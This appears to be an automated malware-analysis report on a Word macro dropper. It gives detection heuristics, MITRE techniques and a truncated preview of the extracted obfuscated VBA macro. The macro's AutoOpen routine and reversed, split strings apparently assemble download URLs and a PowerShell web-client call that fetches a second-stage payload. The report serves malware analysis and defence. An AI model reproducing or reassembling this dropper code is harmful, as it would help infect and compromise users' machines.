MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6545014-0. Critical heuristics indicate the presence of VBA macros and a Shell() function call, suggesting the macro is designed to download and execute a second-stage payload. The Autoopen macro is also present, which is a common technique for automatically running malicious code upon document opening.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6545064-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6545064-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 128091 bytes |
SHA-256: c9e4e521cf5960ae92968b26e2ea89e05605f759d28eb1f51b9fffd282baf903 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "mondKttSHELiq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub aNwlKm(oonXA)
BqdFA = uJZaR
NbAOtq = Wcjzlq
cHtKrz = DXaHp + Sgn(61134 - bSAniA - LXauwm + Fix(58837)) - 70957 - CDbl(40451)
rOVcnP = 28312
End Sub
Sub TjJEaG(KGvKf)
GqiQk = QuLaT
jPbKC = DmEKUm
wTqmf = apdlYm + Sgn(23160 - vwoHF - BqrcAE + Fix(13790)) - 12974 - CDbl(86911)
vWwJn = 99986
IjqsM = iDXql
nQDOw = FcNlb
TwVpBq = PvYfb + Sgn(28731 - plNZcN - zFssI + Fix(99807)) - 8063 - CDbl(65097)
LXFOY = 30551
oBhnWL = kbzzP
PoING = qdwtq
hXMIVA = ZAYYv + Sgn(49667 - nqHQIC - NIXOrI + Fix(6726)) - 47967 - CDbl(12930)
HqponB = 53855
End Sub
Sub zXpTq(NnGhA)
fkoJU = ptdrW
ujQFk = zofLJ
wtRHBE = VYlMW + Sgn(3330 - UYMibH - pZKzH + Fix(6198)) - 91359 - CDbl(66227)
pUaKL = 51881
isZpAb = UuDEq
czjCcJ = HItBG
NvrvrU = bdpCRA + Sgn(25659 - qFEwF - islYh + Fix(4027)) - 14205 - CDbl(81780)
wYjNON = 55360
End Sub
Sub Autoopen()
On Error Resume Next
MkwzwH = lbvDQC
CBffDF = JSmkD
ihnzCN = rNIIj + Sgn(69607 - mGGEa - IVihj + Fix(20559)) - 44497 - CDbl(51210)
SJPuQ = 5142
fMvGwqhKuR (nwACv + vpdmMtN + psXvSA)
CLiKji = zGQrq
ouztoT = jSJDX
LjqKnr = pAGbE + Sgn(28119 - uDhjIL - JutiG + Fix(99161)) - 96892 - CDbl(2815)
CimEWc = 18246
End Sub
Sub cAUqon(oakIf)
cvLLCl = jjsYoP
zRJLR = mEIrZU
VpjOq = Aajbt + Sgn(39768 - MPvIwC - jZWQZ + Fix(81040)) - 71702 - CDbl(96647)
mTmhi = 52539
AdhSPi = qQrbh
IAvXv = vTQpA
BCwHGm = lZviO + Sgn(68605 - FLjAh - DbPmY + Fix(29414)) - 73349 - CDbl(13820)
XjnhhN = 53788
iJEPw = NVhnmS
mQHlha = KjrAEF
LrjBv = uzqdzG + Sgn(59189 - Qrbzp - kTfwAn + Fix(79011)) - 14165 - CDbl(99187)
DKruB = 58736
End Sub
Sub lropo(ilavk)
sPBPKR = LkBHom
YapPkA = qqIAFv
BKZsEN = CCuhc + Sgn(18628 - QkjAC - ADvLLk + Fix(13985)) - 2515 - CDbl(49145)
PEWzJZ = 52429
End Sub
Attribute VB_Name = "jZqWYviHq"
Sub aFZzD(twPOh)
GGcJi = GMJqJU
dAdfA = DtoaTT
BRDLK = hPSku + Sgn(27204 - FBiJk - EjZEQS + Fix(28249)) - 71220 - CDbl(57811)
SfIqPb = 78208
End Sub
Function vpdmMtN()
On Error Resume Next
zjwnA = PjRjY
OiqXO = bNntvb
pzElX = dMVMD + Sgn(304 - iOojB - MbMopl + Fix(54606)) - 66674 - CDbl(160)
VEkUjL = 21568
UzVcaS = oiCiiH
QBuHD = tGCpwk
bASoKK = jpPnt + Sgn(72940 - ukjOl - plhaW + Fix(1053)) - 56787 - CDbl(89769)
ujiqm = 23617
oizohJV = bHVvo("U8nFP)29]rAhC[]GnIRtn", 5626 + 2 - 5626, 5626 + 15 - 5626)
QOYUvY = lHNRUw
WaMfq = TrRJhR
ujIDz = HURqRJ + Sgn(33625 - vTJiJ - qYFRKv + Fix(41859)) - 38480 - CDbl(46885)
OmiCjC = 96503
hlrwi = QWsVUO
DsBjhN = zMoRw
icsjFR = MjIMJG + Sgn(38518 - VRjKoY - tOHWt + Fix(26809)) - 13912 - CDbl(40864)
azwJnd = 23093
hIYrOF = bHVvo("FH'/'+'m'+'1x'+'Q'+'l/'+'ed.ngise'+'drenzleb'+'/'+'/:pt'+'t'+'h@/9sQ'+'AQwMJ'+'/'+'562'+'51-'+'rebmuN'+'-eci'+'ov'+'nI'+'/te'+'n'+'.'+'skcoddapeht/'+'/:pt'+'th@'+'/Xj'+'ZMM0r/'+'ku.'+'o'+'c'+'.'+'RfUP", 18306 + 5 - 18306, 18306 + 194 - 18306)
CdXWj = ZbtIbv
GIJYj = ZjXXFK
lKJKK = FQILAj + Sgn(19441 - huzFf - oUqmlE + Fix(97288)) - 73899 - CDbl(61644)
FSLXDO = 34250
aAYtUS = wljYiH
GMpAB = fsIVj
cPabq = BjQpw + Sgn(26872 - ZkUBB - dzuXo + Fix(69309)) - 90228 - CDbl(50490)
zisDMS = 80329
hYwwBzpOzL = bHVvo("IT@aIRtS[,'VBT'(EcAlPER.)'$',)611]rAhC[+801]rAhC[+511]rAhC[((EcAlPER.zwRU", 67625 + 5 - 67625, 67625 + 65 - 67625)
WJsFjb = QObzcS
qHUDC = rlrvsL
hwvBij = zsIvw + Sgn(46846 - GaIvwX - sliJQH + Fix(68327)) - 70496 - CDbl(36107)
MUsRUS = 51166
IbopNQ = iAdCwj
jaWzTZ = JAUicc
cilCu = IHLja + Sgn(48601 - PJVBCo - svYZj + Fix(29761)) - 83421 - CDbl(98412)
THknoG = 35196
UHitSmiKL = bHVvo("5Q.as'+'ada'+'sntls'+' = BSN'+'tls;'+'t'+'neilCbeW'+'.'+'teN.'+'m'+'etsyS'+' '+')MSEtc'+'ejbo'+'-MS'+'E+MS'+'EwM'+'SE+MSEenMS'+'E(. ='+' '+'P0", 32127 + 3 - 32127, 32127 + 136 - 32127)
zENjZO = YuqYzi
focOj = LSibI
rbpluJ = dBwaTT + Sgn(62696 - AoYSzw - bwLZZ + Fix(15145)) - 61418 - CDbl(63283)
mXsWK
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.